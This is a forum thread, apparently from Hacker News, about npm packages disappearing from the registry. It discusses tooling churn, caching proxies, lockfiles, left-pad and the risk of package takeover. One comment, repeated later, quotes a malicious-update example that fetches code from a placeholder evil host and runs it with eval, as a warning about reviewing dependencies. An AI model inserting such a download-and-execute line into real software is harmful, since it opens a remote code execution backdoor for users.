Most companies of any size are allergic to "pick your own toolchain" development strategies. The infrastructure team has to support them. Someone has to be responsible for hiring. Security needs to be able to review the environment. Employees should be able to be moved between teams. And so forth.
Sure, I suppose devops can mitigate the infrastructure support problem, but overall most companies strongly prefer standardization.
No. My complaint is that things never get fixed properly. The complex problems around software distribution (which proper package managers have made a good stab at solving for decades) are ignored in favour of steamrollering over the problems with naive solutions and declaring that everything "just works" only for the wheels to come off a few years later running into a dead end which many of us saw from miles off.
This is particularly true for package/dependency management, but the attitude is found more broadly.
For what it's worth, the javascript world isn't alone here. Python, with its new Pipfile/pipenv system is on its, what, fifth, sixth? stab at solving package management "once and for all" and it's all truly dire and not something I depend on when I have the choice.
Nix solves pretty much all of these problems and a few more, but I expect it to be a decade or so before people realize it.
I'm not complaining about new things. These aren't new things. They're about a decade behind the curve.
Because each thing has a constant price in learning effort that is familiarizing yourself with its idiosyncrasies, which you have to pay even if you're experienced in the domain. When tools constantly get replaced instead of improved, you keep paying that price all the time.
> Because each thing has a constant price in learning effort
That's not, in my experience, how it works. Learning your first tool (or language) takes a lot of time. Learning your second is quicker. By the tenth, you're able to learn it by skimming the README and changelog.
It works like this for languages too, at least for me. My first "real" language (aside from QBasic) was C++ and it took me 3-4 years to learn it to an acceptable degree. Last week I learned Groovy in about 4 hours.
It still "adds up", but to a much lower value than you'd think.
But it does, you're just focusing on the other component of learning.
Put another way, for a new tool, learning cost is a sum of a) cost of learning idiosyncrasies of that tool, and b) cost of getting familiar with the concepts used by it.
You're talking about b), which is indeed a shared expense. But a), by definition, isn't. And it's always nonzero. And since new tools are usually made to differ from previous ones on purpose ("being opinionated", it's called), even though they fix some minor things, this cost can be meaningful. And, it adds up with every switch you need to do.
Some of it is a normal part of life of a software developer, but JS ecosystem has taken it to ridiculous extremes.
My argument is that the a) part's cost is indeed non-zero, but - contrary to what you say - trivial in a vast majority of cases. It's just my personal experience, but it happened every single time I tried to learn something: learning "what" and "why" took (potentially a lot of) time, but learning "how" was a non-issue, especially if a "quick reference" or a "cheat sheet" was available. I also disagree that the a) part is never shared between tools: there are only so many possible ways of doing things, but a seemingly infinite supply of tools for doing them. The idiosyncrasies are bound to get repeated between tools and, in my experience, it happens pretty often.
As an example, imagine you're learning Underscore.js for the first time. It's a mind-blowing experience, which takes a lot of time because you have to learn a bunch crazy concepts, like currying, partial application, binding, and others. You also have to learn Underscore-specific idiosyncrasies, like the order of arguments passed to the callback functions and the like - mostly because you are not yet aware which things are important to know and which are just idiosyncrasies.
Now, imagine you know Underscore already and have to learn Lo-dash or Ramda.js. As the concepts remain very similar, you only need to learn a few conventions, which are different in Ramda. But! Even then, you don't have to really learn all of them to use the library effectively. It's enough to keep the diff of the Underscore and Ramda conventions in mind: learning that, for example, the order of arguments passed to callbacks differ is enough; you can then check the correct order in the docs whenever you need. You know where to find that piece of information, you know when it matters and, by extension, when it's not a concern. There is no need to waste time trying to learn trivia: not doing something is always going to be the fastest way of doing it. By your second library, you start to recognize trivia and are able to separate it from informations that matter. Learning prelude.ls afterward is going to take literally 30 minutes of skimming the docs.
This is just an example, but it worked like that for me in many cases. When I switched from SVN to Bazaar, for example, it took quite a bit of time to grok the whole "distributed" thing. When I later switched from Bazaar to Git it took me literally an hour to get up to speed with it, followed by a couple more hours - spaced throughout a week or two - of reading about the more advanced features. Picking up Mercurial after that was more or less automatic.
I guess all of this hinges upon the notion of the level of familiarity. While I was able to use bzr, git and hg, it only took so little time because I consciously chose to ignore their intricacies, which I knew I won't need (or won't need straight away). On the other hand, you can spend months learning a tool if your goal is a total mastery and contributing to its code. But the latter is very rarely something you'd be required to do, most of the time the level of basic proficiency is more than enough. In my experience, the cost of reaching such a level of proficiency becomes smaller as you learn more tools of a particular kind.
That's the reason I disagree with your remark that that cost is "constant". It's not, it's entirely dependent on a person and the knowledge they accumulated so far. Learning Flask may take you a week if you're new to web development in Python, but you could learn it in a single evening if you worked with Bottle already. On a higher level, learning Elixir may take you months, but you could also accomplish it in a week, provided that you already knew Erlang and Scheme well.
So that's it - the cost of learning new tools may be both prohibitive and trivial at the same time, depending on a prior knowledge of a learner. The good thing about the "prior knowledge and experience" is that it keeps growing over time. The amount of knowledge you'll have accumulated in 20 years is going to be vast to the extent that's hard to imagine today. At that point, the probability of any tool being genuinely new to you will hit rock bottom and the average cost of switching to another tool should also become negligible.
To summarize: I believe that learning new tools gets easier and easier with time and experience and - while never really reaching 0 - at some point, the cost becomes so low that it doesn't matter anymore (unless you have to switch really often, of course).
I'm not sure. I did it because of Jenkins Pipeline DSL; I learned enough to write ~400 loc of a build script from scratch. I was able to de-sugar the DSL and wrap raw APIs with a DSL of my own design (I'd say that I "wrote a couple of helper functions", but the former sounds way cooler...). I did stumble upon some gotchas - the difference between `def` and simple assignment when the target changes, for example.
EDIT: I wonder, is that level of proficiency enough for you to at least drop the scare quotes around "learn"? I feel that putting the quotes there is rather impolite.
> did you skim some docs and just learn what Groovy should be?
As I elaborate on in the comment below, there are different levels of proficiency and I never claimed mastery - just a basic proficiency allowing me to read all of the language constructs and write, as mentioned, a simple script from scratch, with the help of the docs.
> And did you already know any Java beforehand?
Well, a bit, although I didn't work with it professionaly in the last decade. However, knowing Java wouldn't be enough to make learning Groovy that fast - I have another trump card up my sleeve when it comes to learning programming languages. You might be interested in a section of my blog here: https://klibert.pl/articles/programming_langs.html if you want to know what it is. To summarize: I simply did it more than 100 times already.
> the scare quotes around "learn"? I feel that putting the quotes there is rather impolite
When I say I've learned (or learnt) a programming language, I mean more than a 4-hour jump start to basic proficiency level. Perhaps I was letting off some steam over the wild claims many programmers make regarding their PL expertise.
Did you know that Jenkins Pipeline cripples Groovy so all its features aren't available, specifically the Collections-based methods that form the basis of many DSL's?
> Did you know that Jenkins Pipeline cripples Groovy
Yes. I've run into some limitations; first because of a Pipeline DSL, and when I ditched it in favor of normal scripting I ran into further problems, like Jenkins disallowing the use of isinstance (due to a global configuration of permissions, apparently - I don't have administrative rights there) and many other parts of the language. It was kind of a pain, actually, because I developed my script locally - mostly inside groovysh - where it all worked beautifully and it mysteriously stopped working once uploaded. A frustrating experience, to say the least.
> over the wild claims many programmers make regarding their PL expertise.
I believe I'm a bit of a special case[1] here, wouldn't you agree? Many of the languages on that list I only learned about, however, many of them I learned, having written several thousand (on the low end) of lines of code in them. It's got to be at least 30, I think? I'd need to count.
Anyway, I argue that such an accumulation causes a qualitative difference in how you learn new languages, allowing for rapid acquisition of further ones. It's like in role-playing games, if you buff your stats high enough you start getting all kinds of bonuses not available otherwise :)
[1] If I'm not and you know of someone with the same hobby, please let me know! I'd be thrilled to talk to such a person!
The problem isn't with that one tool alone. The problem is with the entire ecosystem, in which all the tools get regularly replaced by "better" ones. It all adds up.
To be precise, new tools are continuously created to address the weaknesses of other tools. This happens in other languages, just more slowly due to smaller community sizes.
"new tools are continuously created to address the weaknesses of other tools, instead of fixing those weaknesses in those other tools" - FTFY.
> This happens in other languages, just more slowly due to smaller community sizes.
Yeah, my point is that there is a cost for learning learning a new tool; the faster those new tools replace the old ones (instead of someone fixing the old ones), the more you have to pay of that cost.
What ideally should be happening is that existing tools get incrementally upgraded to fix issues and add improvements rather than scrapped and replaced as if they're disposable.
To be completely fair, it isn't exactly drop-in. There's new commands for a bunch of things, mainly around adding new packages locally and globally. I led the yarn switch effort on my direct team and had people coming to me weeks after asking how to do X because of the different commands.
I suspected that someone would mention this, but the fact of the matter is both systems are mostly interoperable. The switch from npm
to yarn would be nothing like migrating from Gulp + Browserify to Webpack.
To switch to yarn, I printed out a one-page cheat sheet and taped it to my wall. I’ve had one blunder in the time I’ve used it (misunderstanding what `yarn upgrade` did x_x), but it was easily reverted.
Even in this relatively close case, it's not a zero-overhead transition. There are some changes. There are some new behaviours. You still need to know which things really work exactly the same and where the differences come from even if those differences are only minor. You always need due diligence about whether a new tool is reliable, future-proof, trustworthy, etc. And that's all after finding out about the new tool and deciding this one is actually worth looking into.
Multiply all of that by the absurd degree of over-dependence and over-engineering in the JS ecosystem, and it's entirely fair to question whether the constant nagging overheads are worthwhile.
It _badfles_ me that _technologists_ (whatever that means) dismiss others writing without actually reading it. It's not us, the detractors, complaining about using new technology because it's "new". For one, it's not new, it's the n-th undeveloped iteration of a technology 20 years old. We're not complaining about you using technology, it's us complaining about you ignoring the advances that could buy alcohol in the US by now.
JS ecosystem is pretty well know for changing very fast compared to other mainstream languages. This is a fair point, NPM could implement the local cache without (hopefully) breaking anything
From my understanding they’ve always had one, but until npm@5 it wasn’t safe for concurrent access (side note: Maven still isn’t) and was prone to corruption. I think they’re making their way toward true offline cacheing a-la yarn, if they haven’t done so already.
We are talking about tools here. Standards are a different beast.
For example it is cool to have multiple tools doing the same thing is cool because you have the choice to use what fits your need (e.g. different Web Servers).
On the other hand, having multiple competing standards for the same job is just technological cancer and mostly the result of some commercial competition (or the attempt to fix a standard by replacing it).
Hmm, I Java world we pretty much always used a local (company-owned) Maven proxy server, which grabbed packages from public repos and cached them locally to make sure builds still work if public servers were down or slow... or packages disappeared.
I’ve worked at places where the Java devs used Maven Central directly. I’ve also worked at a place where the Node devs use an on-premises copy of dependencies for builds and deploys.
It might not be as standard a practice in the Java world as you think.
Possibly Sonarqube Nexus. The Java devs at my workplace use Sonarqube along with Jenkins and Maven on the same server. I believe they communicate through the shared directory on the file system.
(Pet peeve: another product named "Nexus". Please choose original names for your software.)
yarn does local caching in developer laptops. What GP is referring to is having an on-prem private dependency server which acts as a cache and proxy to the centralized public dependency repo.
I never understood the love for package managers that directly hook and import things into your codebase or repo or even worse servers. I guess the benefit is that "it just works", but the fact that you do not know where a package is coming from can't be worrying just me.
In my company we take the stable version of the library we want to use and we self-host it. We basically have added a cache that we manage and control what goes into it instead of just trusting a manager. Especially for server-side deployment this is mandatory for security. Things like let's say ffmpeg etc - we never get from random packages but we host them ourselves.
> "I never understood the love for package managers that directly hook and import things into your codebase or repo or even worse servers. I guess the benefit is that "it just works", but the fact that you do not know where a package is coming from can't be worrying just me."
I share your concern. It's a tradeoff: tools that do this are very convenient, and the people who have thought about it have decided in some cases that convenience outweighs the security or stability aspects. And people can make that determination on a case-by-case basis.
This can be a good strategy, it just trades one set of problems for another.
Bleeding-edge packages from possibly compromised hosts, or self-hosted old versions with potential bugs, security issues, and hard-to-find documentation.
Pick your poison, unless you're Red Hat and can spend the time to backport security/bug fixes and maintain a knowledge base for your old versions.
We really need to hear from NPM why this happened.
There is currently no way for a user to remove their own packages or unpublish packages anymore from the public NPM API ( a change following the `left-pad` incident ).
This leads me to believe this was an internal NPM error. My guess is employee error.
Only for a version less than 24 hours old. You can no longer remove established packages.
A quote from the documentation page you linked:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
> Update - Most of the deleted packages have been restored and installation of those packages should succeed. Nine packages are still in the process of restoration.
> Jan 6, 20:12 UTC
> Beginning at 18:36 GMT today, 106 packages were made unavailable from the registry. 97 of them were restored immediately. Unfortunately, people published over 9 of them, causing delays in the restoration of those 9. We are continuing to clean up the overpublications. All installations that depend on the 106 packages should now be working.
Hard to believe less than a hundred packages cause so many issues. NPM's dependency hierarchy is pretty insane.
Gah. Moments like these always gives me a bit of panic, since I realize that so much of my software relies on external sources.
Relying on npm, Atlassian/GitHub etc really hurts when stuff like this happens. Issues always gets resolved, but cases such as the GitLab incident should be enough to always keep some local copies around.
I've stopped wondering about NPMs structure. But still: Our bog-standard in-house java development setup would be unaffected by this class of problems. You need some kind of private maven repository, and nexus or artifactory automatically mirrors downloaded dependencies. And on top of that, versions are pinned per default. So new malicious versions wouldn't be used either. We could safely build new hotfix releases even with maven central 100% down or compromised.
Granted, we do depend on bitbucket. However, I am honestly scared to self-host our code. This is a small but old shop, so the entire code base is easily several million dollars worth in man-hours alone. And then again, it's git, so if push comes to shove, we could easily and quickly spin up an internal gitlab instance and push our stuff there to get back up.
npm does pin versions by default (although originally they did not). The fact that you _need_ to have a local mirror for Maven isn't really a plus for Java. You can get a local mirror or similar setup for npm also.
> Gah. Moments like these always gives me a bit of panic, since I realize that so much of my software relies on external sources.
Install an instance of Sonatype Nexus, create a proxy-repo for npm (and Maven if you also use Java) and that's it.
What, however, won't be caught is Docker (because that crap insists on directly talking to the Dockerhub servers, which is a giant security hole waiting to happen) and PHP composer (because it likes to pull dependencies via git from GH, so no caching there).
> You can setup mirrors for dockerhub... Or any docker registry.
But you can't make dockerd talk to this mirror by default, unless you're running the fossil Redhat fork. That is the problem: if you want to use Docker, you must open up your server to the Internet, and the entire Internet at it as the Docker infrastructure is loadbalanced and there are no guarantees the IPs will stay stable.
Does not work as soon as you use node modules that come with native components that have to be recompiled for the machine, and there are many of these.
Colleagues have been bitten by this - one used OS X 10.11, the other 10.12, and they experienced weird bugs from this. Went away once they kicked out node_modules from git.
Yeah, it’s an annoying problem. Maybe you could gitignore the *.node (the native module file extension) files only. But I’m not sure how you’d rebuild those “on demand” after a checkout without running 'npm install' from the top level.
That has some advantages, but some really big drawbacks as well:
- Incredibly slow git operations unless you use the perfect options every time (good luck, new devs).
- Requires either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read.
- Actually understanding the diffs you read. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
This was the officially recommended solution for long, but suffers from a few issues. Most notably for me is that pull requests that change any dependencies become impossible to read (on github at least).
Having additional copies is always a good idea, but you already get that by just installing the modules on developers' machines.
At some point you have to trust a third party. Even if you run your own hardware, you still depend on power and internet provided by someone else. And unless you are a massive company, time is typically spent much better on other things than hosting your own NPM packages and git repos.
I don't think there is any part of my little software empire that is dependant on code for which I don't have the source or underlying .dll checked into source control.
It's part of your project. You absolutely need a copy of it.
I take it you're replying to me? My little software empire also keep local copies, that kind of defeats the purpose of using git for teamwork or package management to keep dependencies in check.
These are building blocks in a normal dev environment, and it would take me massive amounts of time to manage everything on my own.
The local copies are fragile and not as easily shared.
You've lost me. Why would it take more time to check in your dependencies and have the rest of your team get them out of source control? All the package manager would do would be to download them off the internet to the same location. Might as well only have one guy do that once and be done with it.
You need to archive them somewhere anyway (to mitigate the issue we're discussing here), so why not keep them in the obvious place?
This is why I develop on Sourcetree for Github/Travis/Heroku inside a Dropbox folder. It gives another layer of flexibility and redundancy. If Dropbox fails, all I lose is filesystem sync - and one type of restoration - for a short while. (Bluntly, Github and Dropbox provide very similar services for synchronizing code between computers.)
Having a redundant array of independent cloud providers seems the ideal state. This is the most effective way to provide a single source of truth without it becoming a single point of failure.
> "
Several packages including "require-from-string" are currently unavailable. We are aware of the issue and are working to restore the affected user and packages. Please do not attempt to republish packages, as this will hinder our progress in restoring them.
Posted 4 minutes ago. Jan 06, 2018 - 19:45 UTC
Late to the party, but can't wait for the technical write up on this.
I think npm has been a headache for everyone at some point, which is one of the main reasons I started contributing to Yarn. I think npm has done a lot of good work in the past year to respond to the necessary change, so kudos to them for their work; however, it's nowhere near the rock-solid package manager that we need. If the Javascript ecosystem is to ever be taken seriously, and not as a toy -- it has to have more reliability.
Ergonomically, I currently thing it's ahead of many other package managers because of how simple it is to get running. The number of "gotcha's" after npm install is nothing to shake a stick at, though.
One of the things you can do to get builds that aren't as suspect to npm registry issues is configuring an offline mirror [1].
From the post:
"Repeatable and reliable builds for large JavaScript projects are vital. If your builds depend on dependencies being downloaded from network, this build system is neither repeatable nor reliable.
One of the main advantages of Yarn is that it can install node_modules from files located in file system. We call it “Offline Mirror” because it mirrors the files downloaded from registry during the first build and stores them locally for future builds."
Can anyone explain why the npm registry still exists if it cannot guarantee that uploaded packages remain available? The current state makes it pretty useless as a reliable source te base software on because you never know if you're able to build it again in the future.
They should take a good hard look at NuGet, which does not allow packages to be deleted so builds are guaranteed to be reliable. Still doesn't hurt to locally cache packages with software such as Klondike.
They don't allow packages to be deleted. A bug or server issue or mistake caused this. This type of problem has occurred only once before. In general npm has been extremely reliable and performant.
We do this with all of our PHP dependencies at work, they get committed into the project. The upside is that the deployment process is simpler, the server doesn't have to fetch all the libraries you depend on within each deploy and it mitigates all of the risk of left-pad style bullshit.
You can store dependencies in version control so you can continue working when there is problem with remote package manager repositories as you just checkout last working version with all dependencies from git.
While it may not be the right time to _start_, incidents like this are an excellent reason to consider an internal read-through proxy package repository. The last couple of organisations I've worked with have used Artifactory: https://jfrog.com/artifactory/
And ppl think i'm crazy for keeping packages in SCM repo. NPM get so much abuse, people depending on them without paying a dime. At least put up a caching proxy hosted by your own if you depend so much on npm for your operations.
In my org, we use Artifactory as a cache between us and external sources. They have a free version too. I'd encourage everyone to use it, or something like it. Stop pointing your package managers to the public registry.
Minutes before reading this comment I sent an email to our team to verify our artifactory did not download any packages over the weekend. Most likely not as nobody is working (to add a new one or update a version) but better safe than sorry. +1 for artifactory cache.
Stop pointing your package managers to the public registry.
Unfortunately with NPM this is still awkward, because as soon as you try to shrinkwrap your project, it doesn't just pin the version numbers, it also pins the full source location. That's in direct conflict with (and apparently takes precedence over) using one of the local caching proxies that would otherwise be a useful practical solution to this problem, and the situation gets even more complicated if you have people building at multiple locations and want each to have their own proxy.
Yarn seems to have a better approach to this. It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options (IMHO a mistake since the big selling point of Yarn is its deterministic, reproducible behaviour) but at least you can do something resembling a local cache combined with something resembling version pinning, which is the ante for any sane build system.
Don't use shrinkwrap - this comes directly from Laurie Voss, COO of NPM Inc. In my own experience using npm shrinkwrap has been pretty bad.
NPM has its own lockfiles now, similar to yarn.
> It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options
This I've never noticed. I'm genuinely curious how it would happen. The only way I imagine it might happen is if you do a fresh install with no cache and some of the packages have moved or changed on the registry. Do you happen to have more details?
Some of its commands, notably install, can modify yarn.lock if it's out of sync with package.json, and I think that by default they still do so silently. You can override that modification with various options, but it seems to defeat the point of a tool whose main function is to ensure stable, repeatable builds if something on say your CI server or a developer's machine after a source control merge can wind up with a locally modified yarn.lock that doesn't fetch identical versions of all dependencies to what everyone else is using.
Edit: Also thanks for the tip about npm's new locking mechanism. Apparently that arrived with NPM 5. I just checked, and we have developer machines here that were last updated well under a year ago and are still on NPM 3, and that had itself been installed along with something like the third new major version of Node in not much over a year. I don't know how anyone is supposed to do development intelligently while the most fundamental tools for things like dependency management are bumping a major version and radically changing how they do even the most basic and essential things literally every few months. :-(
It is fundamentally more secure as it functions as a private controlled proxy for the public repo. Also solves some other nice gotchas such as people pulling a left-pad joke on you and reproducible installs as all packages are cached so your build servers and dev systems get the same version of all packages (if properly used with shrinkwrap kind of solutions, or even without if properly handled).
We self-host Artifactory. If our internal instance goes down, it's always possible to fall back to the public registry of language (NPM, Maven, pip etc). It's far more unlikely for our Artifactory and the public registry to go down simultaneously.
With npm 4 things went south and never came home to us. We use macs, pcs, linux machines and nowdays we fear `npm i` like the plague. I don't care if it's the registry, the executable, the stupid packagelock.json, node-npm version mismatch or an installer script, the endresult is frustration.
This is insane. This is like Google changing their v1 APIs, except worse since ANYONE could come in and put new malicious APIs up in its place. I say this as a firm supporter of Node and the ecosystem - this should NEVER EVER be allowed to occur. This completely erodes the trust model based around "popular packages" even further - the only saving grace is that hopefully most devs are shrinkwrapping their modules.
I wish the NPM community would grow some humility and learn some lessons about how the debian environment was built. Have sane licensing that allows mirroring, have crypto-hash of packets. Have open governance.
The "wild west" model is where there is no maintainer or distributor between the developer and consumer that is allowed to perform any sort of quality control or sanitisation. That sounds good from a naive standpoint - who needs this busybody middleman anyway? But the problem is that authors tend not to be great maintainers. Authors can (and do) remove packages at any time, make changes to packages without bumping version numbers, upload subtly broken versions or possibly make user-hostile changes which the community can then do nothing about short of creating a fork (which is messy switching over dependencies to a different package name). And that's not even to go into typo-squatting.
In short, package authors don't tend to care about much more than getting their package to work, somehow, anyhow. Often only the latest version of that package, too. And they don't always have an eye on interoperability with other packages, or consistency across a collection. Maintainers who create a "distribution" of software that works well together can collaboratively make decisions that are in the community's best interest. The "wild west" model is unilateral, the "maintained" model is multi-lateral.
>The "wild west" model is where there is no maintainer or distributor between the developer and consumer that is allowed to perform any sort of quality control or sanitisation.
That's not entirely true. Maintainers or distributors aren't required under the "wild-west" model, but that's not the same as anything being disallowed. It's up to the community and the developer to do their own due diligence. The "wild west" model is just the free software model, it's just the lack of some central authority limiting user freedom for the good of the community.
Rather, it's the "distribution" model which forbids anything not approved by the list of official maintainers. All of the problems you list with package authors still exist, but you have fewer options as a developer should they arise.
Why Node.js comes with a client for a for profit company is still baffling me. NPM team has proven time and time again they are not competent enough to handle this responsibility yet they are given the free ride by the Node.js foundation.
Node.js package manager SHOULD BE COMMUNITY OWNED/DRIVEN
The sheer number of software development organizations who cannot function when github or their package repository happens to be unavailable (for whatever reason) is incredibly disheartening.
Was just discussing this elsewhere online. Package management is broken (or incomplete, depending on your viewpoint). What's needed IMO is the following:
1. Allow a single package file, including multiple clauses (or sub-files, whatever) for different languages. Let me manage my Angular front-end and Flask back-end in the same file. A single CLI tool as well - Composer and Bower aren't all that different.
2. Be the trusted broker, with e.g. MD5 checking, virus scanning, some kind of certification/badging/web of trust thing. Let developers know if it's listed, it's been vetted in some way.
3. Allow client-side caching, but also act as a cache/proxy fetch for package retrieval. That way, if Github or source site is down, the Internet doesn't come to a screeching halt. I see the value of Satis, but it's a whole additional tool to solve just one part of this one problem.
4. Server-side dependency solver. Cache the requests and give instant answers for similar requests. All sorts of value-adds in analytics here, made more valuable by crossing language boundaries.
5. Act as an advocate for good semver, as part of the vetting above.
NOTE: These features are not all-or-nothing, I believe there's value from implementing each one on its own. Also note that nothing here should lock people into one provider for these services. There's a market to be made here.
TL;DR: "no malicious actors were involved in yesterday’s incident, and the security of npm users’ accounts and the integrity of these 106 packages were never jeopardized."
A more detailed report will follow in the next days.
It seems that someone took over the package during its absence from npm and deployed a version 2.0.5. Maybe to avoid any malicious takeover. But there is no version 2.0.5 anymore.
I don't use NPM (or community managed package managers in general), but anyone know why there isn't an LTS feature with packages? So that, when searching packages, if a package is flagged as LTS, you know that it and all its dependencies have long term support and there are contingencies on what happens if the package is abandoned. Obviously, there would need to be a community that reviews and approves packages that aim to be LTS.
I think there's a difference between committing to source control and having local copies. For example, we use Red Hat Satellite at work which you give a list of upstream repos and filters, and it download copies locally (to what it calls a 'capsule'). Then to get those packages to your machines you have to publish through the lifecycle process (Test > Staging > Live A > Live B - or whatever you choose).
There's multiple ways to solve to mitigate the risk, but committing libraries in to source control can cause way more headaches than it prevents IMO.
Don't store libraries in your project's repository. It bloats things like hell and makes it difficult to navigate the change sets. Set up your own library cache. Store that cache in its own repo if that floats your boat. Then all of your projects can get their dependencies from your cache.
Well, if you are in other languages that have an actual standard library (so you don't need 500 packages to make up for it) and only a few dependent libraries that are well package and you don't need to update frequently.
This is a rehash of my comment elsewhere here, responding to a similar point:
There are advantages to checking in all your deps, but many drawbacks as well (especially for an interpreted language; something like Go avoids a few of these):
- Incredibly slow SCM operations unless you use the perfect options every time (good luck, new devs). I've experienced this with Perforce and Git, and hoo boy does a "get three cups of coffee while you wait"-time diff/commit operation throw a hitch in your plans.
- You need either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read when you update stuff.
- Actually understanding the diffs you read when packages get updated. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
- Hassles with regards to compiled dependencies. You have to filter them out of source control (can be a hassle to find all the places they live), or remember to rebuild when changing OS versions/stdlib versions/runtime versions/architectures/etc. That can get pretty annoying, especially since in my experience each "runtime loaded" compiled dependency gives you many completely different, utterly unintelligible errors when it's used in an environment where it should be rebuilt.
Well, Q allows you to choose between “each individual publishes their own stream” and some degree of “centralized publishing” by management teams of groups. So who should publish a stream, the individual or the group?
If the individual - the risk is that the individual may have too much power over others who come to rely on the stream. They may suddenly stop publishing it, or cut off access to everyone, which would hurt many people. (I define hurt in terms of needs or strong expectations of people that form over time.)
If the group - then managers may come and go, but the risk is that if the group is too big, it may be out of touch with the individuals. The bigger risk is that the individuals are forced to go along with the group, which may also create a lot of frustration. For instance, the group may give rise to into three sub-groups. They are deciding where to go, but some people want to go bowling, others want to go to the movies, others want to volunteer in a soup kitchen. Even though everyone belongs to the group. Who should publish these activities?
So I think when it comes to publishing streams that others can join, there should be some combination of groups and individuals. And it should reflect the best practices of what happens in the real world: one person starts a group that may later become bigger than him. Then this group grows, gets managers etc. After a while this person may leave. In the future, other individuals may want to start their own groups and invite some members of the old group to join. They may establish relationships between each other, subscribe to each other’s streams, pay each other money, etc.
If this was only a matter of missing packages, this would "only" be a matter of breaking builds.
But it looks like third parties were able to take over the missing packages, see https://github.com/npm/registry/issues/256 - which is a HUGE deal, considering "npm install" blindly executes the scripts in a package's preinstall property (as well as the packaged module itself possibly containing arbitrary backdoors)
This is why you should depend on exact versions whenever possible. But even if you do, your dependencies most likely won't, so you are screwed anyways.
The caret syntax for auto-upgrading to the next minor version is the open door to a world of bullshit.
I don't remember the intricacies of NPM or Yarn, but don't one/both of them have resource integrity enabled, so that you know that the package that's being installed is the one in your lock file? If not, why isn't this a feature especially after the clusterfuck of the guy deleting all his packages back about two years ago, breaking tons of things including Babel and React?
This wouldn't fix the issue of someone deleting the actual package (this happened here?), but it would prevent some malicious code being installed if someone uses the same package name.
left-pad was a package to, you guessed it, pad a string with n leading characters. Personally, I've always just written my own 2 line function for it (something like `function pad(s, n, ch) { return new Array(n - s.length).fill(ch).join("") + s; }`), but a bunch of packages either directly or indirectly depended on this left-pad package, so they all broke.
Well... No. the left-pad function is 11 lines. The source code, as it was back then, according to that register article, was like this:
function leftpad (str, len, ch) {
str = String(str);
var i = -1;
if (!ch && ch !== 0) ch = ' ';
len = len - str.length;
while (++i < len) {
str = ch + str;
}
return str;
}
But yes, packages broke because of what _could_ have been implemented in one line (ignoring the two lines for the function signature and closing curly).
I just don't understand how this can happen. In Maven Central for example (Java) if you publish a package it is immutable and stays there until nuclear fire immolates the Earth.
Unless I'm misunderstanding something about Central's architecture, it's not fundamentally different from NPM in this regard, though signing appears a bit more feasible.
Which means that it's not a technical difference. Maybe Central has been compromised/had issues before, just long ago (it's certainly much older). Maybe there are things wrong with NPM-as-a-company even if NPM-as-a-technology is fine. Maybe it's just luck.
But "stays there until nuclear fire immolates the Earth" sounds a bit much like "this ship is completely unsinkable" for my liking.
You know, back in the "old days", we used to host packages on these sites called "mirrors", so when one went down, we could get the package from another, and verify authenticity using multiple sources and signed files. There would be hundreds of mirrors for one set of files.
Kind of funny how shitty modern technology is. But I heard a quote recently that kind of explains it: "The more sophisticated something is, the easier it is to break it."
This may be a stupid question - I'm not that familiar with NPM or modern javascript development so forgive me, but does it not allow storing your dependencies locally? Is that not considered best practice? Just download your entire dependency tree and don't touch it unless you have to.
It seems to me that if packages "disappear" from upstream, it shouldn't have any effect other than preventing an update due to the missing dependency.
It does store them locally. I think the problems here are:
- The missing packages can be replaced by someone who wasn't the original package author (e.g. a malicious hacker)
- It's not easy to catch this ^^^ because NPM doesn't have support for signing versions in your project's dependency configuration... (I bet it will after this.)
- Almost every modern website has a dependency on NPM somewhere in their build chain
- NPM being down means loads of sites can't deploy properly
It might be easier to catch if packages were namespaced by author and package name, or even directly by URL, the way Composer does with PHP dependencies. It's easier to spoof 'infinity-agent' than 'floatdrop/infinity-agent' or 'github:floatdrop/infinity-agent'
The Maven Central repository for JVM dependencies doesn't share the problem of packages being removed like NPM periodically has, but Adam Bien has been instructing users to download the source-code for their dependencies and then compile them to their own repositories for quite a few years.
I wish I'd taken his advice as there are a couple of JAR files that I can no longer update.
I don't understand much about the blockchain, but one thing I have heard is that it's impossible (or very hard) to remove things from it. It is immutable, sort of append only, if I understand it correctly. So my question is, is there anyone working on moving npm to the blockchain? Or doing something like a package manager on the blockchain? If not, why not?
No. That's not what I'm talking about. That's just a way to host your own snapshot of the entire npm registry. Not a good way to introduce the decentralization feature of IPFS.
You don't need a full blockchain for this: the relevant property is (somewhat tautologically) that it's an append-only data structure. By convention, everyone processing the blockchain looks to make sure that the new blockchain they get is a descendant of the previous blockchain they already have.
There are lots of other structures that work like this. Git is one - when git fetches a branch, git will check whether the remote branch includes all the commits it saw last time it fetched, or some are missing. (By default this is non-fatal but tends to produce warnings/errors when you try to actually use the replaced branch, but you can easily make this fatal.) Another good one is the style of Merkle trees used in Certificate Transparency: there's no proof-of-work, so the trees are small, but they still include a cryptographic hash of each previous tree so you can detect if something has gone missing.
The other relevant property of the blockchain is that it's not a reference to data elsewhere, it (like git) actually contains all the data that's ever been on the blockchain, and you need that data to verify the blockchain properly. This may or may not be what you want for a programming language package manager; it means that in order to set up a new development environment, you have to download every version npm package that ever existed. It does accomplish the goal of preventing things from being removed, but it's pretty heavy-weight.
> By convention, everyone processing the blockchain looks to make sure that the new blockchain they get is a descendant of the previous blockchain they already have.
This is not true. Bitcoin-esque blockchains are NOT append only. The only thing clients do is: 1) ensure the blockchain they have received is valid, and 2) that it is longer (more total PoW). If those conditions are met, they will consider that new chain the current chain.
You can come up with a new, completely different sequence of blocks, send it to clients on the network, and get them to start using that new chain instead as long as it has more PoW.
Oh, right. That seems like not a property you want in software releases - there shouldn't be a possibility of getting spoofed data (or metadata), either you get a signed release or no release at all. Bitcoin needs that because there's no signing authority.
The key thing here is that there is an obvious central authority for software releases (the NPM registry, or GitHub, or Debian, or whatever), so proof-of-work-style systems are overkill because you don't fundamentally need decentralization. You could imagine some sort of decentralized first-come-first-serve software registry, but that doesn't seem obviously better than a central one.
